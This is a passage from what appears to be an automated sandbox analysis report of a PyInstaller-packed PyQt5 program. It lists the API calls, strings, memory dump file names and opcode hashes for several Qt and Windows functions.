                                                                                                                                                                                                                • ?isNull@QByteArray@@QEBA_NXZ.QT5CORE ref: 00007FFB02FDC54F
                                                                                                                                                                                                                • ?constData@QByteArray@@QEBAPEBDXZ.QT5CORE ref: 00007FFB02FDC55C
                                                                                                                                                                                                                • ?dateTimeToString@QCalendar@@QEBA?AVQString@@VQStringView@@AEBVQDateTime@@AEBVQDate@@AEBVQTime@@AEBVQLocale@@@Z.QT5CORE ref: 00007FFB02FDC5A7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • dateTimeToString, xrefs: 00007FFB02FDC669
                                                                                                                                                                                                                • BJ1J1J1J1J9, xrefs: 00007FFB02FDC469
                                                                                                                                                                                                                • QCalendar, xrefs: 00007FFB02FDC670
                                                                                                                                                                                                                • dateTimeToString(self, format: Optional[str], datetime: Union[QDateTime, datetime.datetime], dateOnly: Union[QDate, datetime.date], timeOnly: Union[QTime, datetime.time], locale: QLocale) -> str, xrefs: 00007FFB02FDC65E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Array@@ByteTime@@$?const?dateCalendar@@Data@DateDate@@Locale@@@Null@StringString@String@@TimeView@@malloc
                                                                                                                                                                                                                • String ID: BJ1J1J1J1J9$QCalendar$dateTimeToString$dateTimeToString(self, format: Optional[str], datetime: Union[QDateTime, datetime.datetime], dateOnly: Union[QDate, datetime.date], timeOnly: Union[QTime, datetime.time], locale: QLocale) -> str
                                                                                                                                                                                                                • API String ID: 1828054465-2567551947
                                                                                                                                                                                                                • Opcode ID: 0a9fe2e4f4e6457d2aa6ad3ba75cea358af3770a6a2e4418ecde774e1517da23
                                                                                                                                                                                                                • Instruction ID: 4512dbb6d6030403edbe8e469db6c1e20d75c9ecf47ad8637bc5a36606592eb8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a9fe2e4f4e6457d2aa6ad3ba75cea358af3770a6a2e4418ecde774e1517da23
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E461E47660AB85D9DB508F26E8846E933B4FB48B88F545136EE8D53B28EF39D154C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF60B13F0AA,?,?,000001FA7A846098,00007FF60B13AD53,?,?,?,00007FF60B13AC4A,?,?,?,00007FF60B135F3E), ref: 00007FF60B13EE8C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF60B13F0AA,?,?,000001FA7A846098,00007FF60B13AD53,?,?,?,00007FF60B13AC4A,?,?,?,00007FF60B135F3E), ref: 00007FF60B13EE98
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                • Instruction ID: 0a70a7169346e91d69e7f68a8c30b46f6a43a9cb8164af1bc1b6e7a58d1b4373
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F141C222B19B1281FA15CB16A8006762291BF4DFD8FA8C579DD1FC7BA4FF3CE8458214
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF60B123706,?,00007FF60B123804), ref: 00007FF60B122C9E
                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF60B123706,?,00007FF60B123804), ref: 00007FF60B122D63
                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF60B122D99
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                • Instruction ID: a0b362aafc76152c99c3d42619b74eece519d441d04c92d0bbb646b3934bf014
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4431C532B08A4142E6209B25B8542AB7691BF8DB9CF518135EF4ED3769EF3CD516C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?mimeTypeForData@QMimeDatabase@@QEBA?AVQMimeType@@AEBVQByteArray@@@Z.QT5CORE ref: 00007FFB02FB235E
                                                                                                                                                                                                                • ?mimeTypeForData@QMimeDatabase@@QEBA?AVQMimeType@@PEAVQIODevice@@@Z.QT5CORE ref: 00007FFB02FB241A
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Mime$?mimeData@Database@@TypeType@@$Array@@@ByteDevice@@@malloc
                                                                                                                                                                                                                • String ID: BJ1$BJ8$QMimeDatabase$mimeTypeForData$mimeTypeForData(self, data: Union[QByteArray, bytes, bytearray]) -> QMimeTypemimeTypeForData(self, device: Optional[QIODevice]) -> QMimeType
                                                                                                                                                                                                                • API String ID: 235356401-1884366556
                                                                                                                                                                                                                • Opcode ID: fc049d12d60f8c5be929f1b462e9a7b7a16ca951d3e232029d27cfa6159d3cf0
                                                                                                                                                                                                                • Instruction ID: c18aab4f996082a444e81a4edac01d4f5be4b0be488bb341f738c557b32ca71f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc049d12d60f8c5be929f1b462e9a7b7a16ca951d3e232029d27cfa6159d3cf0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7414CB6619F4685DB909F26E848AAA73A4FB8CF80F594036CE9D53724EF3CD548C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong$?removeColumns@Index@@@ModelModel@@ProxyTranspose
                                                                                                                                                                                                                • String ID: Bii|J9$QTransposeProxyModel$removeColumns$removeColumns(self, column: int, count: int, parent: QModelIndex = QModelIndex()) -> bool
                                                                                                                                                                                                                • API String ID: 4124212836-2524339115
                                                                                                                                                                                                                • Opcode ID: 24a63cda8a5e1223c1631c2bb78882bb38ef34ed2442cf754fdb193784032045
                                                                                                                                                                                                                • Instruction ID: 92fd77f8059bf34a908867b5b3f405be111aca39a07cec76ada4342b3613d248
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24a63cda8a5e1223c1631c2bb78882bb38ef34ed2442cf754fdb193784032045
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D415176609B85C5DB608F25F4847AA77A4FB84B90F584236DACD13B68EF7CD158CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FromLongLong_$?rowCount@FilterIndex@@@ModelModel@@ProxySort
                                                                                                                                                                                                                • String ID: B|J9$QSortFilterProxyModel$rowCount$rowCount(self, parent: QModelIndex = QModelIndex()) -> int
                                                                                                                                                                                                                • API String ID: 1037702878-3442372265
                                                                                                                                                                                                                • Opcode ID: 1e8d68581be5aacb0b73784de0463ed8e135f77abd0f3036b1ae040202754c63
                                                                                                                                                                                                                • Instruction ID: a566f9785567afba4bfb995f784e052ccd3265727187647b8de469c5043d41b6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e8d68581be5aacb0b73784de0463ed8e135f77abd0f3036b1ae040202754c63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4316FB2609F85C6DB609F25F8447AA77A4FB88B90F480235DA9D13B68EF3CD059C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_LongThread$?writeData@Device@@FileFromLong_RestoreSave
                                                                                                                                                                                                                • String ID: QTemporaryFile$writeData$writeData(self, data: Optional[PyQt5.sip.array[bytes]]) -> int
                                                                                                                                                                                                                • API String ID: 1988964924-1917787709
                                                                                                                                                                                                                • Opcode ID: b6211c7e622e580555981d7f3bff2754d23705fef29bbbc9e1be444c0ad460db
                                                                                                                                                                                                                • Instruction ID: 5ea73a6ec8e4356c34050276917a269d40d2f58d8da943d3b68b42e328dbd3f9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6211c7e622e580555981d7f3bff2754d23705fef29bbbc9e1be444c0ad460db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 162110B6A09B46C5EB409F25F5486AA77A4FB84BC0F584132DA8D13B68EF7DD188C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_LongSaveThread$?writeData@File@@FromLong_Restore
                                                                                                                                                                                                                • String ID: QSaveFile$writeData$writeData(self, data: Optional[PyQt5.sip.array[bytes]]) -> int
                                                                                                                                                                                                                • API String ID: 1709558933-3146772046
                                                                                                                                                                                                                • Opcode ID: 5632c9be09bd3e3d4563180acb81251d66b07a87a353585ab461583d54a96847
                                                                                                                                                                                                                • Instruction ID: b1fd2dd517b9855b73c09e68a554e92b1508f10b244e1acfe503fa67437a7488
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5632c9be09bd3e3d4563180acb81251d66b07a87a353585ab461583d54a96847
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A2152B5A09B4685EA408F35F4586AA77A4FB84FC0F584032DA8D13B38EF7DD048C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$?setAbstractBool_Data@FromHeaderItemLongModel@@Orientation@Qt@@RestoreSaveVariant@@
                                                                                                                                                                                                                • String ID: QIODevice$waitForReadyRead$waitForReadyRead(self, msecs: int) -> bool
                                                                                                                                                                                                                • API String ID: 3094561814-214061967
                                                                                                                                                                                                                • Opcode ID: e6274cf67a7c0b57ea308ac27090cc788559a170de4afe2dc7d4e639458c304e
                                                                                                                                                                                                                • Instruction ID: 7ee5676a0a663901b6fa7b39a3b40201db63e008fbf7d46ac1dfb42b5b7a6a40
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6274cf67a7c0b57ea308ac27090cc788559a170de4afe2dc7d4e639458c304e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4215CB2A09B46C6EA409B25F4587AA77A4FF84BC0F580132DA8D13B68DF7CD149C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
